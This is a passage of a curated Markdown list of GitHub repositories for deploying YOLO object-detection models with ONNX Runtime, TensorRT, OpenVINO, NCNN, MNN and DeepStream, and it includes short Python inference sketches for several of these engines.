- [ONNX Runtime](https://github.com/microsoft/onnxruntime) <img src="https://img.shields.io/github/stars/microsoft/onnxruntime?style=social"/> : ONNX Runtime: cross-platform, high performance ML inferencing and training accelerator. [onnxruntime.ai](https://onnxruntime.ai/) (a minimal Python inference sketch follows this list).
- [ONNX](https://github.com/onnx/onnx) <img src="https://img.shields.io/github/stars/onnx/onnx?style=social"/> : Open Neural Network Exchange. Open standard for machine learning interoperability. [onnx.ai](https://onnx.ai/)
- [ONNXMLTools](https://github.com/onnx/onnxmltools) <img src="https://img.shields.io/github/stars/onnx/onnxmltools?style=social"/> : ONNXMLTools enables you to convert models from different machine learning toolkits into [ONNX](https://github.com/onnx/onnx). [onnx.ai](https://onnx.ai/)
- [xboot/libonnx](https://github.com/xboot/libonnx) <img src="https://img.shields.io/github/stars/xboot/libonnx?style=social"/> : A lightweight, portable pure C99 onnx inference engine for embedded devices with hardware acceleration support.
- [kraiskil/onnx2c](https://github.com/kraiskil/onnx2c) <img src="https://img.shields.io/github/stars/kraiskil/onnx2c?style=social"/> : Open Neural Network Exchange to C compiler. Onnx2c is an [ONNX](https://onnx.ai/) to C compiler. It reads an ONNX file and generates C code to be included in your project. Onnx2c's target is "Tiny ML", meaning running the inference on microcontrollers.
- [tract](https://github.com/sonos/tract) <img src="https://img.shields.io/github/stars/sonos/tract?style=social"/> : Sonos' neural network inference engine. Tiny, no-nonsense, self-contained TensorFlow and ONNX inference.
- [ort](https://github.com/pykeio/ort) <img src="https://img.shields.io/github/stars/pykeio/ort?style=social"/> : A Rust wrapper for ONNX Runtime. [docs.rs/ort](https://docs.rs/ort/latest/ort/)
- [onnxruntime-rs](https://github.com/nbigaouette/onnxruntime-rs) <img src="https://img.shields.io/github/stars/nbigaouette/onnxruntime-rs?style=social"/> : This is an attempt at a Rust wrapper for [Microsoft's ONNX Runtime](https://github.com/microsoft/onnxruntime) (version 1.8).
- [Wonnx](https://github.com/webonnx/wonnx) <img src="https://img.shields.io/github/stars/webonnx/wonnx?style=social"/> : Wonnx is a GPU-accelerated ONNX inference run-time written 100% in Rust, ready for the web.
- [altius](https://github.com/maekawatoshiki/altius) <img src="https://img.shields.io/github/stars/maekawatoshiki/altius?style=social"/> : Small ONNX inference runtime written in Rust.
- [Hyuto/yolo-nas-onnx](https://github.com/Hyuto/yolo-nas-onnx) <img src="https://img.shields.io/github/stars/Hyuto/yolo-nas-onnx?style=social"/> : Inference with the YOLO-NAS ONNX model. [hyuto.github.io/yolo-nas-onnx/](https://hyuto.github.io/yolo-nas-onnx/)
- [DanielSarmiento04/yolov10cpp](https://github.com/DanielSarmiento04/yolov10cpp) <img src="https://img.shields.io/github/stars/DanielSarmiento04/yolov10cpp?style=social"/> : Implementation of YOLOv10 in C++ (std 17) on top of OpenCV and onnxruntime.
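A minimal ONNX Runtime Python inference sketch for an exported YOLO model. The input name `images` and the 640×640 shape are common YOLOv5 export defaults but are assumptions here; query the session for the real values, and note that NMS is usually applied separately:

```python
# Hedged ONNX Runtime inference sketch (CPU provider).
import numpy as np
import onnxruntime as ort

session = ort.InferenceSession("yolov5s.onnx", providers=["CPUExecutionProvider"])
input_name = session.get_inputs()[0].name  # e.g. "images" for YOLOv5 exports

# NCHW float32 tensor, normalized to [0, 1].
dummy = np.random.rand(1, 3, 640, 640).astype(np.float32)
outputs = session.run(None, {input_name: dummy})
print([o.shape for o in outputs])  # raw prediction tensors, NMS not applied
```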
- ##### TensorRT
- [NVIDIA/TensorRT](https://github.com/NVIDIA/TensorRT) <img src="https://img.shields.io/github/stars/NVIDIA/TensorRT?style=social"/> : NVIDIA® TensorRT™ is an SDK for high-performance deep learning inference on NVIDIA GPUs. This repository contains the open source components of TensorRT. [developer.nvidia.com/tensorrt](https://developer.nvidia.com/tensorrt)
- [NVIDIA/TensorRT-LLM](https://github.com/NVIDIA/TensorRT-LLM) <img src="https://img.shields.io/github/stars/NVIDIA/TensorRT-LLM?style=social"/> : TensorRT-LLM provides users with an easy-to-use Python API to define Large Language Models (LLMs) and build TensorRT engines that contain state-of-the-art optimizations to perform inference efficiently on NVIDIA GPUs. TensorRT-LLM also contains components to create Python and C++ runtimes that execute those TensorRT engines. [nvidia.github.io/TensorRT-LLM](https://nvidia.github.io/TensorRT-LLM)
- [laugh12321/TensorRT-YOLO](https://github.com/laugh12321/TensorRT-YOLO) <img src="https://img.shields.io/github/stars/laugh12321/TensorRT-YOLO?style=social"/> : 🚀 TensorRT-YOLO: supports YOLOv3, YOLOv5, YOLOv6, YOLOv7, YOLOv8, YOLOv9, YOLOv10, PP-YOLOE and PP-YOLOE+ with TensorRT acceleration and EfficientNMS! Integrates the EfficientNMS TensorRT plugin for post-processing, uses CUDA kernels to accelerate preprocessing, and offers both C++ and Python inference.
- [l-sf/Linfer](https://github.com/l-sf/Linfer) <img src="https://img.shields.io/github/stars/l-sf/Linfer?style=social"/> : A high-performance C++ inference library based on TensorRT: YOLOv10, YOLOPv2, YOLOv5/7/X/8, RT-DETR, and single-object tracking with OSTrack and LightTrack.
- [Melody-Zhou/tensorRT_Pro-YOLOv8](https://github.com/Melody-Zhou/tensorRT_Pro-YOLOv8) <img src="https://img.shields.io/github/stars/Melody-Zhou/tensorRT_Pro-YOLOv8?style=social"/> : This repository is based on [shouxieai/tensorRT_Pro](https://github.com/shouxieai/tensorRT_Pro), with adjustments to support YOLOv8. Currently supports high-performance inference for YOLOv8, YOLOv8-Cls, YOLOv8-Seg, YOLOv8-OBB, YOLOv8-Pose, RT-DETR, ByteTrack, YOLOv9, YOLOv10 and RTMO. 🚀🚀🚀
- [shouxieai/tensorRT_Pro](https://github.com/shouxieai/tensorRT_Pro) <img src="https://img.shields.io/github/stars/shouxieai/tensorRT_Pro?style=social"/> : C++ library based on TensorRT integration.
- [shouxieai/infer](https://github.com/shouxieai/infer) <img src="https://img.shields.io/github/stars/shouxieai/infer?style=social"/> : A new TensorRT integration, easy to integrate into many tasks.
- [kalfazed/tensorrt_starter](https://github.com/kalfazed/tensorrt_starter) <img src="https://img.shields.io/github/stars/kalfazed/tensorrt_starter?style=social"/> : This repository gives a guideline to learn CUDA and TensorRT from the beginning.
- [hamdiboukamcha/yolov10-tensorrt](https://github.com/hamdiboukamcha/yolov10-tensorrt) <img src="https://img.shields.io/github/stars/hamdiboukamcha/yolov10-tensorrt?style=social"/> : YOLOv10 C++ TensorRT: Real-Time End-to-End Object Detection.
- [triple-Mu/YOLOv8-TensorRT](https://github.com/triple-Mu/YOLOv8-TensorRT) <img src="https://img.shields.io/github/stars/triple-Mu/YOLOv8-TensorRT?style=social"/> : YOLOv8 accelerated with TensorRT!
- [FeiYull/TensorRT-Alpha](https://github.com/FeiYull/TensorRT-Alpha) <img src="https://img.shields.io/github/stars/FeiYull/TensorRT-Alpha?style=social"/> : 🔥🔥🔥 TensorRT for YOLOv8, YOLOv8-Pose, YOLOv8-Seg, YOLOv8-Cls, YOLOv7, YOLOv6, YOLOv5, YOLO-NAS...... 🚀🚀🚀 CUDA IS ALL YOU NEED. 🍎🍎🍎
- [cyrusbehr/YOLOv8-TensorRT-CPP](https://github.com/cyrusbehr/YOLOv8-TensorRT-CPP) <img src="https://img.shields.io/github/stars/cyrusbehr/YOLOv8-TensorRT-CPP?style=social"/> : A C++ implementation of YOLOv8 using TensorRT, supporting object detection, semantic segmentation, and body pose estimation.
- [NVIDIA-AI-IOT/torch2trt](https://github.com/NVIDIA-AI-IOT/torch2trt) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/torch2trt?style=social"/> : An easy to use PyTorch to TensorRT converter (see the sketch at the end of this subsection).
- [zhiqwang/yolort](https://github.com/zhiqwang/yolort) <img src="https://img.shields.io/github/stars/zhiqwang/yolort?style=social"/> : yolort is a runtime stack for yolov5 on specialized accelerators such as tensorrt, libtorch, onnxruntime, tvm and ncnn. [zhiqwang.com/yolort](https://zhiqwang.com/yolort/)
- [Linaom1214/TensorRT-For-YOLO-Series](https://github.com/Linaom1214/TensorRT-For-YOLO-Series) <img src="https://img.shields.io/github/stars/Linaom1214/TensorRT-For-YOLO-Series?style=social"/> : YOLO Series TensorRT Python/C++: TensorRT for the YOLO series (YOLOv8, YOLOv7, YOLOv6....) with NMS plugin support.
- [wang-xinyu/tensorrtx](https://github.com/wang-xinyu/tensorrtx) <img src="https://img.shields.io/github/stars/wang-xinyu/tensorrtx?style=social"/> : TensorRTx aims to implement popular deep learning networks with TensorRT network definition APIs.
- [DefTruth/lite.ai.toolkit](https://github.com/DefTruth/lite.ai.toolkit) <img src="https://img.shields.io/github/stars/DefTruth/lite.ai.toolkit?style=social"/> : 🛠 A lite C++ toolkit of awesome AI models with ONNXRuntime, NCNN, MNN and TNN: YOLOX, YOLOP, YOLOv6, YOLOR, MODNet, YOLOv7, YOLOv5 and 100+ other popular open-source models, covering object detection, face detection and recognition, semantic segmentation, matting and more.
- [PaddlePaddle/FastDeploy](https://github.com/PaddlePaddle/FastDeploy) <img src="https://img.shields.io/github/stars/PaddlePaddle/FastDeploy?style=social"/> : ⚡️ An Easy-to-use and Fast Deep Learning Model Deployment Toolkit for ☁️ Cloud, 📱 Mobile and 📹 Edge. Including Image, Video, Text and Audio 20+ main stream scenarios and 150+ SOTA models with end-to-end optimization, multi-platform and multi-framework support.
- [enazoe/yolo-tensorrt](https://github.com/enazoe/yolo-tensorrt) <img src="https://img.shields.io/github/stars/enazoe/yolo-tensorrt?style=social"/> : TensorRT8. Supports Yolov5n/s/m/l/x and darknet -> tensorrt; Yolov4/Yolov3 use raw darknet *.weights and *.cfg files. If the wrapper is useful to you, please star it.
- [guojianyang/cv-detect-robot](https://github.com/guojianyang/cv-detect-robot) <img src="https://img.shields.io/github/stars/guojianyang/cv-detect-robot?style=social"/> : 🔥🔥🔥🔥🔥🔥 Docker, NVIDIA Docker2, YOLOV5, YOLOX, YOLO, DeepSort, TensorRT, ROS, DeepStream, and Jetson Nano/TX2/NX for high-performance deployment.
- [BlueMirrors/Yolov5-TensorRT](https://github.com/BlueMirrors/Yolov5-TensorRT) <img src="https://img.shields.io/github/stars/BlueMirrors/Yolov5-TensorRT?style=social"/> : Yolov5 TensorRT implementations.
- [lewes6369/TensorRT-Yolov3](https://github.com/lewes6369/TensorRT-Yolov3) <img src="https://img.shields.io/github/stars/lewes6369/TensorRT-Yolov3?style=social"/> : TensorRT for Yolov3.
- [CaoWGG/TensorRT-YOLOv4](https://github.com/CaoWGG/TensorRT-YOLOv4) <img src="https://img.shields.io/github/stars/CaoWGG/TensorRT-YOLOv4?style=social"/> : tensorrt5, yolov4, yolov3, yolov3-tiny, yolov3-tiny-prn.
- [isarsoft/yolov4-triton-tensorrt](https://github.com/isarsoft/yolov4-triton-tensorrt) <img src="https://img.shields.io/github/stars/isarsoft/yolov4-triton-tensorrt?style=social"/> : YOLOv4 on Triton Inference Server with TensorRT.
- [TrojanXu/yolov5-tensorrt](https://github.com/TrojanXu/yolov5-tensorrt) <img src="https://img.shields.io/github/stars/TrojanXu/yolov5-tensorrt?style=social"/> : A TensorRT implementation of yolov5.
- [tjuskyzhang/Scaled-YOLOv4-TensorRT](https://github.com/tjuskyzhang/Scaled-YOLOv4-TensorRT) <img src="https://img.shields.io/github/stars/tjuskyzhang/Scaled-YOLOv4-TensorRT?style=social"/> : Implement yolov4-tiny-tensorrt, yolov4-csp-tensorrt, yolov4-large-tensorrt (p5, p6, p7) layer by layer using the TensorRT API.
- [Syencil/tensorRT](https://github.com/Syencil/tensorRT) <img src="https://img.shields.io/github/stars/Syencil/tensorRT?style=social"/> : A TensorRT-7 network library covering common object detection, keypoint detection, face detection, OCR and more; trainable on your own data.
- [SeanAvery/yolov5-tensorrt](https://github.com/SeanAvery/yolov5-tensorrt) <img src="https://img.shields.io/github/stars/SeanAvery/yolov5-tensorrt?style=social"/> : YOLOv5 in TensorRT.
- [Monday-Leo/YOLOv7_Tensorrt](https://github.com/Monday-Leo/YOLOv7_Tensorrt) <img src="https://img.shields.io/github/stars/Monday-Leo/YOLOv7_Tensorrt?style=social"/> : A simple implementation of TensorRT YOLOv7.
- [ibaiGorordo/ONNX-YOLOv6-Object-Detection](https://github.com/ibaiGorordo/ONNX-YOLOv6-Object-Detection) <img src="https://img.shields.io/github/stars/ibaiGorordo/ONNX-YOLOv6-Object-Detection?style=social"/> : Python scripts performing object detection using the YOLOv6 model in ONNX.
- [ibaiGorordo/ONNX-YOLOv7-Object-Detection](https://github.com/ibaiGorordo/ONNX-YOLOv7-Object-Detection) <img src="https://img.shields.io/github/stars/ibaiGorordo/ONNX-YOLOv7-Object-Detection?style=social"/> : Python scripts performing object detection using the YOLOv7 model in ONNX.
- [triple-Mu/yolov7](https://github.com/triple-Mu/yolov7) <img src="https://img.shields.io/github/stars/triple-Mu/yolov7?style=social"/> : End2end TensorRT YOLOv7.
- [hewen0901/yolov7_trt](https://github.com/hewen0901/yolov7_trt) <img src="https://img.shields.io/github/stars/hewen0901/yolov7_trt?style=social"/> : C++ TensorRT deployment code for the YOLOv7 object detector.
- [tsutof/tiny_yolov2_onnx_cam](https://github.com/tsutof/tiny_yolov2_onnx_cam) <img src="https://img.shields.io/github/stars/tsutof/tiny_yolov2_onnx_cam?style=social"/> : Tiny YOLO v2 Inference Application with NVIDIA TensorRT.
- [Monday-Leo/Yolov5_Tensorrt_Win10](https://github.com/Monday-Leo/Yolov5_Tensorrt_Win10) <img src="https://img.shields.io/github/stars/Monday-Leo/Yolov5_Tensorrt_Win10?style=social"/> : A simple implementation of TensorRT yolov5 in Python/C++. 🔥
- [Wulingtian/yolov5_tensorrt_int8](https://github.com/Wulingtian/yolov5_tensorrt_int8) <img src="https://img.shields.io/github/stars/Wulingtian/yolov5_tensorrt_int8?style=social"/> : TensorRT INT8 quantized deployment of the YOLOv5s model; measured at 3.3 ms per frame!
- [Wulingtian/yolov5_tensorrt_int8_tools](https://github.com/Wulingtian/yolov5_tensorrt_int8_tools) <img src="https://img.shields.io/github/stars/Wulingtian/yolov5_tensorrt_int8_tools?style=social"/> : TensorRT INT8 quantization tools for the YOLOv5 ONNX model.
- [MadaoFY/yolov5_TensorRT_inference](https://github.com/MadaoFY/yolov5_TensorRT_inference) <img src="https://img.shields.io/github/stars/MadaoFY/yolov5_TensorRT_inference?style=social"/> : TensorRT quantization and inference code for YOLOv5, tested to run on the Jetson platform.
- [ibaiGorordo/ONNX-YOLOv8-Object-Detection](https://github.com/ibaiGorordo/ONNX-YOLOv8-Object-Detection) <img src="https://img.shields.io/github/stars/ibaiGorordo/ONNX-YOLOv8-Object-Detection?style=social"/> : Python scripts performing object detection using the YOLOv8 model in ONNX.
- [we0091234/yolov8-tensorrt](https://github.com/we0091234/yolov8-tensorrt) <img src="https://img.shields.io/github/stars/we0091234/yolov8-tensorrt?style=social"/> : YOLOv8 TensorRT acceleration.
- [FeiYull/yolov8-tensorrt](https://github.com/FeiYull/yolov8-tensorrt) <img src="https://img.shields.io/github/stars/FeiYull/yolov8-tensorrt?style=social"/> : TensorRT + CUDA accelerated deployment of YOLOv8; the code runs on Windows and Linux.
- [cvdong/YOLO_TRT_SIM](https://github.com/cvdong/YOLO_TRT_SIM) <img src="https://img.shields.io/github/stars/cvdong/YOLO_TRT_SIM?style=social"/> : 🐇 A single codebase supporting TensorRT inference for YOLOX, v5, v6, v7 and v8, with pre- and post-processing implemented as CUDA kernels (C++/CUDA). 🚀
- [cvdong/YOLO_TRT_PY](https://github.com/cvdong/YOLO_TRT_PY) <img src="https://img.shields.io/github/stars/cvdong/YOLO_TRT_PY?style=social"/> : 🐰 A single Python codebase supporting TensorRT inference for YOLOv5, v6, v7 and v8. ✈️
- [Psynosaur/Jetson-SecVision](https://github.com/Psynosaur/Jetson-SecVision) <img src="https://img.shields.io/github/stars/Psynosaur/Jetson-SecVision?style=social"/> : Person detection for Hikvision DVR with AlarmIO ports, uses TensorRT and yolov4.
- [tatsuya-fukuoka/yolov7-onnx-infer](https://github.com/tatsuya-fukuoka/yolov7-onnx-infer) <img src="https://img.shields.io/github/stars/tatsuya-fukuoka/yolov7-onnx-infer?style=social"/> : Inference with the YOLOv7 ONNX model.
- [ervgan/yolov5_tensorrt_inference](https://github.com/ervgan/yolov5_tensorrt_inference) <img src="https://img.shields.io/github/stars/ervgan/yolov5_tensorrt_inference?style=social"/> : TensorRT C++ inference for the Yolov5 model. Supports yolov5 v1.0, v2.0, v3.0, v3.1, v4.0, v5.0, v6.0, v6.2, v7.0.
- [AlbinZhu/easy-trt](https://github.com/AlbinZhu/easy-trt) <img src="https://img.shields.io/github/stars/AlbinZhu/easy-trt?style=social"/> : TensorRT for YOLOv10 with CUDA.
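A hedged usage sketch for NVIDIA-AI-IOT/torch2trt, referenced above: convert a PyTorch module to a TensorRT engine by tracing it with example inputs. It requires a CUDA-capable GPU with TensorRT installed; `resnet18` stands in for a detection network here purely for brevity:

```python
# torch2trt conversion sketch (assumes torch2trt and TensorRT are installed).
import torch
from torch2trt import torch2trt
from torchvision.models import resnet18

model = resnet18(weights="DEFAULT").eval().cuda()
x = torch.randn(1, 3, 224, 224).cuda()

model_trt = torch2trt(model, [x], fp16_mode=True)  # build an FP16 engine
# Sanity check: compare TensorRT output against the original PyTorch module.
print(torch.max(torch.abs(model(x) - model_trt(x))))
```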
- ##### OpenVINO
- [OpenVINO](https://github.com/openvinotoolkit/openvino) <img src="https://img.shields.io/github/stars/openvinotoolkit/openvino?style=social"/> : This open source version includes several components: namely Model Optimizer, OpenVINO™ Runtime, Post-Training Optimization Tool, as well as CPU, GPU, MYRIAD, multi device and heterogeneous plugins to accelerate deep learning inferencing on Intel® CPUs and Intel® Processor Graphics (a minimal Python inference sketch follows this list).
- [PINTO0309/OpenVINO-YoloV3](https://github.com/PINTO0309/OpenVINO-YoloV3) <img src="https://img.shields.io/github/stars/PINTO0309/OpenVINO-YoloV3?style=social"/> : YoloV3/tiny-YoloV3 + RaspberryPi3/Ubuntu LaptopPC + NCS/NCS2 + USB Camera + Python + OpenVINO.
- [TNTWEN/OpenVINO-YOLOV4](https://github.com/TNTWEN/OpenVINO-YOLOV4) <img src="https://img.shields.io/github/stars/TNTWEN/OpenVINO-YOLOV4?style=social"/> : Implementation of YOLOv4, YOLOv4-relu, YOLOv4-tiny, YOLOv4-tiny-3l, Scaled-YOLOv4 and INT8 quantization in OpenVINO 2021.3.
- [fb029ed/yolov5_cpp_openvino](https://github.com/fb029ed/yolov5_cpp_openvino) <img src="https://img.shields.io/github/stars/fb029ed/yolov5_cpp_openvino?style=social"/> : A C++ implementation of YOLOv5 deployment with OpenVINO.
- [dlod-openvino/yolov5_infer](https://github.com/dlod-openvino/yolov5_infer) <img src="https://img.shields.io/github/stars/dlod-openvino/yolov5_infer?style=social"/> : Run YOLOv5 model inference with OpenCV/OpenVINO based on the ONNX model format.
- [snail0614/yolov5.6_openvino_cpp](https://github.com/snail0614/yolov5.6_openvino_cpp) <img src="https://img.shields.io/github/stars/snail0614/yolov5.6_openvino_cpp?style=social"/> : A C++ OpenVINO implementation of YOLOv5 v6.1.
- [shungfu/openvino_yolov5v7](https://github.com/shungfu/openvino_yolov5v7) <img src="https://img.shields.io/github/stars/shungfu/openvino_yolov5v7?style=social"/> : YOLOv5 and YOLOv7 INT8 quantization using OpenVINO.
- [dacquaviva/yolov5-openvino-cpp-python](https://github.com/dacquaviva/yolov5-openvino-cpp-python) <img src="https://img.shields.io/github/stars/dacquaviva/yolov5-openvino-cpp-python?style=social"/> : Example of using ultralytics YOLOv5 with OpenVINO in C++ and Python.
- [rlggyp/YOLOv10-OpenVINO-CPP-Inference](https://github.com/rlggyp/YOLOv10-OpenVINO-CPP-Inference) <img src="https://img.shields.io/github/stars/rlggyp/YOLOv10-OpenVINO-CPP-Inference?style=social"/> : YOLOv10 C++ implementation using OpenVINO for efficient and accurate real-time object detection.
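A hedged sketch of the OpenVINO Runtime Python API (2022.x-era `openvino.runtime`): load an IR model and run a single inference on CPU. The file name `yolov5s.xml` is a placeholder produced beforehand by the model conversion tools, and the NCHW input layout is an assumption:

```python
# OpenVINO Runtime inference sketch.
import numpy as np
from openvino.runtime import Core

core = Core()
model = core.read_model("yolov5s.xml")  # matching .bin weights found alongside
compiled = core.compile_model(model, device_name="CPU")

dummy = np.random.rand(1, 3, 640, 640).astype(np.float32)
result = compiled([dummy])  # mapping from output ports to numpy arrays
print([out.shape for out in result.values()])
```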
- ##### NCNN
- [NCNN](https://github.com/Tencent/ncnn) <img src="https://img.shields.io/github/stars/Tencent/ncnn?style=social"/> : ncnn is a high-performance neural network inference framework optimized for the mobile platform (a Python-binding sketch closes this subsection).
- [Baiyuetribe/ncnn-models](https://github.com/Baiyuetribe/ncnn-models) <img src="https://img.shields.io/github/stars/Baiyuetribe/ncnn-models?style=social"/> : Awesome AI models with NCNN, and how they were converted. ✨✨✨
- [cmdbug/YOLOv5_NCNN](https://github.com/cmdbug/YOLOv5_NCNN) <img src="https://img.shields.io/github/stars/cmdbug/YOLOv5_NCNN?style=social"/> : 🍅 Deploy ncnn on mobile phones; supports Android and iOS.
- [natanielruiz/android-yolo](https://github.com/natanielruiz/android-yolo) <img src="https://img.shields.io/github/stars/natanielruiz/android-yolo?style=social"/> : Real-time object detection on Android using the YOLO network with TensorFlow.
- [nihui/ncnn-android-yolov5](https://github.com/nihui/ncnn-android-yolov5) <img src="https://img.shields.io/github/stars/nihui/ncnn-android-yolov5?style=social"/> : The YOLOv5 object detection Android example.
- [szaza/android-yolo-v2](https://github.com/szaza/android-yolo-v2) <img src="https://img.shields.io/github/stars/szaza/android-yolo-v2?style=social"/> : Android YOLO real-time object detection sample application with TensorFlow Mobile.
- [FeiGeChuanShu/ncnn-android-yolox](https://github.com/FeiGeChuanShu/ncnn-android-yolox) <img src="https://img.shields.io/github/stars/FeiGeChuanShu/ncnn-android-yolox?style=social"/> : Real-time yolox Android demo with ncnn.
- [xiangweizeng/darknet2ncnn](https://github.com/xiangweizeng/darknet2ncnn) <img src="https://img.shields.io/github/stars/xiangweizeng/darknet2ncnn?style=social"/> : Darknet2ncnn converts darknet models to ncnn models.
- [sunnyden/YOLOV5_NCNN_Android](https://github.com/sunnyden/YOLOV5_NCNN_Android) <img src="https://img.shields.io/github/stars/sunnyden/YOLOV5_NCNN_Android?style=social"/> : YOLOv5 C++ implementation on Android using the NCNN framework.
- [duangenquan/YoloV2NCS](https://github.com/duangenquan/YoloV2NCS) <img src="https://img.shields.io/github/stars/duangenquan/YoloV2NCS?style=social"/> : This project shows how to run tiny yolo v2 with a Movidius stick.
- [lp6m/yolov5s_android](https://github.com/lp6m/yolov5s_android) <img src="https://img.shields.io/github/stars/lp6m/yolov5s_android?style=social"/> : Run yolov5s on an Android device!
- [KoheiKanagu/ncnn_yolox_flutter](https://github.com/KoheiKanagu/ncnn_yolox_flutter) <img src="https://img.shields.io/github/stars/KoheiKanagu/ncnn_yolox_flutter?style=social"/> : A plugin to run YOLOX on ncnn.
- [cyrillkuettel/ncnn-android-yolov5](https://github.com/cyrillkuettel/ncnn-android-yolov5) <img src="https://img.shields.io/github/stars/cyrillkuettel/ncnn-android-yolov5?style=social"/> : A sample ncnn Android project; it depends on the ncnn library and OpenCV.
- [DataXujing/ncnn_android_yolov6](https://github.com/DataXujing/ncnn_android_yolov6) <img src="https://img.shields.io/github/stars/DataXujing/ncnn_android_yolov6?style=social"/> : A hands-on guide to deploying the YOLOv6 model on Android phones with Qt and NCNN!
- [Qengineering/YoloV3-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV3-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV3-ncnn-Raspberry-Pi-4?style=social"/> : YoloV3 on a Raspberry Pi 4.
- [Qengineering/YoloV4-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV4-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV4-ncnn-Raspberry-Pi-4?style=social"/> : YoloV4 on a bare Raspberry Pi 4 with the ncnn framework.
- [Qengineering/YoloV5-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV5-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV5-ncnn-Raspberry-Pi-4?style=social"/> : YoloV5 for a bare Raspberry Pi 4.
- [Qengineering/YoloV6-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV6-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV6-ncnn-Raspberry-Pi-4?style=social"/> : YoloV6 for a bare Raspberry Pi using ncnn.
- [Qengineering/YoloV7-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV7-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV7-ncnn-Raspberry-Pi-4?style=social"/> : YoloV7 for a bare Raspberry Pi using ncnn.
- [Qengineering/YoloV8-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV8-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV8-ncnn-Raspberry-Pi-4?style=social"/> : YoloV8 for a bare Raspberry Pi 4.
- [FeiGeChuanShu/ncnn-android-yolov8](https://github.com/FeiGeChuanShu/ncnn-android-yolov8) <img src="https://img.shields.io/github/stars/FeiGeChuanShu/ncnn-android-yolov8?style=social"/> : Real-time yolov8 Android demo with ncnn.
- [FLamefiREz/yolov10-android-ncnn](https://github.com/FLamefiREz/yolov10-android-ncnn) <img src="https://img.shields.io/github/stars/FLamefiREz/yolov10-android-ncnn?style=social"/> : yolov10-android-ncnn.
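A hedged sketch of ncnn's Python binding (`pip install ncnn`), mirroring the C++ extractor flow seen across the Android/Raspberry Pi demos above. The `.param`/`.bin` files come from `onnx2ncnn` or `pnnx`, and the blob names `images`/`output` are placeholders that depend on the converted model:

```python
# ncnn Python-binding inference sketch (blob names are assumptions).
import ncnn
import numpy as np

net = ncnn.Net()
net.load_param("yolov5s.param")
net.load_model("yolov5s.bin")

img = (np.random.rand(640, 640, 3) * 255).astype(np.uint8)  # HWC uint8 image
mat = ncnn.Mat.from_pixels(img, ncnn.Mat.PixelType.PIXEL_RGB, 640, 640)
mat.substract_mean_normalize([], [1 / 255.0] * 3)  # scale to [0, 1]; note ncnn's spelling

ex = net.create_extractor()
ex.input("images", mat)           # input blob name from the converted model
ret, out = ex.extract("output")   # returns (status, ncnn.Mat)
print(ret, np.array(out).shape)
```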
- ##### MNN
- [MNN](https://github.com/alibaba/MNN) <img src="https://img.shields.io/github/stars/alibaba/MNN?style=social"/> : MNN is a blazing fast, lightweight deep learning framework, battle-tested by business-critical use cases in Alibaba. (**[MLSys 2020](https://proceedings.mlsys.org/paper/2020/hash/8f14e45fceea167a5a36dedd4bea2543-Abstract.html)**)
- [apxlwl/MNN-yolov3](https://github.com/apxlwl/MNN-yolov3) <img src="https://img.shields.io/github/stars/apxlwl/MNN-yolov3?style=social"/> : MNN demo of Strongeryolo, including channel pruning, android support...

- ##### DeepStream
- [NVIDIA-AI-IOT/deepstream_reference_apps](https://github.com/NVIDIA-AI-IOT/deepstream_reference_apps) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/deepstream_reference_apps?style=social"/> : Reference Apps using DeepStream 6.1.
- [NVIDIA-AI-IOT/deepstream_python_apps](https://github.com/NVIDIA-AI-IOT/deepstream_python_apps) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/deepstream_python_apps?style=social"/> : DeepStream SDK Python bindings and sample applications.
- [NVIDIA-AI-IOT/yolov5_gpu_optimization](https://github.com/NVIDIA-AI-IOT/yolov5_gpu_optimization) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/yolov5_gpu_optimization?style=social"/> : This repository provides a YOLOv5 GPU optimization sample.
- [marcoslucianops/DeepStream-Yolo](https://github.com/marcoslucianops/DeepStream-Yolo) <img src="https://img.shields.io/github/stars/marcoslucianops/DeepStream-Yolo?style=social"/> : NVIDIA DeepStream SDK 6.1.1 / 6.1 / 6.0.1 / 6.0 implementation for YOLO models.
- [DanaHan/Yolov5-in-Deepstream-5.0](https://github.com/DanaHan/Yolov5-in-Deepstream-5.0) <img src="https://img.shields.io/github/stars/DanaHan/Yolov5-in-Deepstream-5.0?style=social"/> : Describes how to use yolov5 in DeepStream 5.0.
- [ozinc/Deepstream6_YoloV5_Kafka](https://github.com/ozinc/Deepstream6_YoloV5_Kafka) <img src="https://img.shields.io/github/stars/ozinc/Deepstream6_YoloV5_Kafka?style=social"/> : This repository gives a detailed explanation on making custom-trained DeepStream-Yolo models predict and send messages over Kafka.
- [kn1ghtf1re/yolov8-deepstream-6-1](https://github.com/kn1ghtf1re/yolov8-deepstream-6-1) <img src="https://img.shields.io/github/stars/kn1ghtf1re/yolov8-deepstream-6-1?style=social"/> : YOLOv8 by Ultralytics in DeepStream 6.1.
- [bharath5673/Deepstream](https://github.com/bharath5673/Deepstream) <img src="https://img.shields.io/github/stars/bharath5673/Deepstream?style=social"/> : YOLOv2, YOLOv5, YOLOv6, YOLOv7, YOLOR and YOLOX on DeepStream.
- [Savant](https://github.com/insight-platform/Savant) <img src="https://img.shields.io/github/stars/insight-platform/Savant?style=social"/> : Python Computer Vision & Video Analytics Framework With Batteries Included. [savant-ai.io](https://savant-ai.io/)

- ##### Other Engine
- [TVM](https://github.com/apache/tvm) <img src="https://img.shields.io/github/stars/apache/tvm?style=social"/> : Open deep learning compiler stack for cpu, gpu and specialized accelerators.
